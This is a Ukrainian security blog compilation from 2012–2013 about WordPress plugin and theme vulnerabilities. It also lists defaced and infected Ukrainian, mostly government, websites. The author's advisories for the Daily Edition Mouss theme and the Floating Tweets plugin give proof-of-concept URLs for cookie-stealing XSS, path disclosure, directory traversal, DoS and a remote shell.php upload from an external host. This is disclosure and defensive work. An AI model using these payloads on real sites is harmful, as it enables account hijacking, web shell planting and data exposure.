Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Myflash, Clockstone та WP Property. Для котрих з’явилися експлоіти. Myflash - це плагін для створення слайдшоу з флешек, Clockstone - це тема движка, WP Property - це плагін для управління списками майна та нерухомості.

• WordPress Myflash Local File Inclusion (деталі)
• WordPress Clockstone Theme File Upload (деталі)
• WordPress WP-Property PHP File Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://sumy-g.upszn-sumy.gov.ua (хакером hatrk) - 11.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://bogodukhivrda.gov.ua (хакером DR-MTMRD) - 18.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vinjust.gov.ua (хакером Nob0dy) - 22.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.formulove.com.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами
• http://ufb.org.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vvadm.gov.ua - інфікований державний сайт - інфекція була виявлена 16.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://statuspress.com.ua - інфекція була виявлена 27.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://vsveta.com.ua - інфекція була виявлена 21.01.2013. Зараз сайт входить до переліку підозрілих.
• http://troeschina.com - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://b-52.kiev.ua - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Video Lead Form, Dailyedition mouss та Ads Box. Для котрих з’явилися експлоіти. Video Lead Form - це плагін для розміщення форми замовлення у відео, Dailyedition mouss - це тема движка, Ads Box - це плагін для розміщення реклами.

• Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL (деталі)
• WordPress Dailyedition-mouss SQL Injection (деталі)
• WordPress Ads Box SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

30.08.2012

У серпні, 16.08.2012, я виявив Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості в плагіні Floating Tweets для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Rokbox.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.01.2013

Full path disclosure (WASC-13):

http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
http://site/wp-content/plugins/floating-tweets/skin.php?skin=1

Directory Traversal (Windows) (WASC-33):

http://site/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=1\1

DT дозволяє зчитувати лише css-файли (в папці /skins/ та підпапках). При відключених mq можна використати Null Byte Injection, що дозволить через DT зчитувати довільні файли.

XSS (persistent XSS) (WASC-08):

Три persistent XSS дірки. Для атаки потрібно обійти захист від CSRF (параметр savewidgets). Наприклад, використовуючи reflected XSS.

Floating Tweets XSS.html

Floating Tweets XSS-2.html

Floating Tweets XSS-3.html

Приклади атак для даних трьох XSS на IE7 та попереді версії. З використанням MouseOverJacking можна атакувати будь-які браузери (при цьому жертва повинна зробити рух мишкою). Код спрацює одразу при відправці запита і в подальшому при відвідуванні http://site/wp-admin/widgets.php.

Floating Tweets XSS-4.html

Приклад атаки на будь-які браузери. Код виконається на головній і будь-якій зовнішній сторінці сайта.

Уразливі Floating Tweets 1.0.1 та попередні версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.kyivobljust.gov.ua (хакерами з Ashiyane Digital Security Team) - 31.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.chernihiv.mns.gov.ua (хакером TURK KURSUNU) - 02.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://agrex.gov.ua (хакером FaiSaL404) - 06.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.s-p.com.ua (хакером Franky)
• http://www.p-planet.net (хакером hacker) - 07.01.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple Gmail Login, List Communities та ArribaLaEsteban. Для котрих з’явилися експлоіти. Simple Gmail Login - це плагін для аутентифікації через логін і пароль до Gmail, List Communities - це плагін для створення спільнот, ArribaLaEsteban - це тема движка.

• Wordpress Plugin Simple Gmail Login Stack Trace Vulnerability (деталі)
• WordPress List Communities SQL Injection (деталі)
• WordPress ArribaLaEsteban SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://isc.gov.ua - інфікований державний сайт - інфекція була виявлена 16.11.2012. Зараз сайт входить до переліку підозрілих.
• http://dsmu.com.ua - інфекція була виявлена 21.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://morevse.com.ua - інфекція була виявлена 26.12.2012. Зараз сайт входить до переліку підозрілих.
• http://afhelp.in.ua - інфекція була виявлена 07.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://hobby-games.com.ua - інфекція була виявлена 04.01.2013. Зараз сайт не входить до переліку підозрілих.

Наближається 2013 рік і я поздоровляю вас з Новим Роком!

Бажаю всього найкращого вам, бажаю безпеки вам, вашим сайтам і веб додаткам .

Слідкуйте за безпекою власних сайтів і тоді з ними нічого поганого не трапиться. І вони будуть надійно працювати та приносити радість вам і вашим відвідувачам.

І для гарного святкового настрою можете послухати композицію Delight (Mix) з мого нового альбому.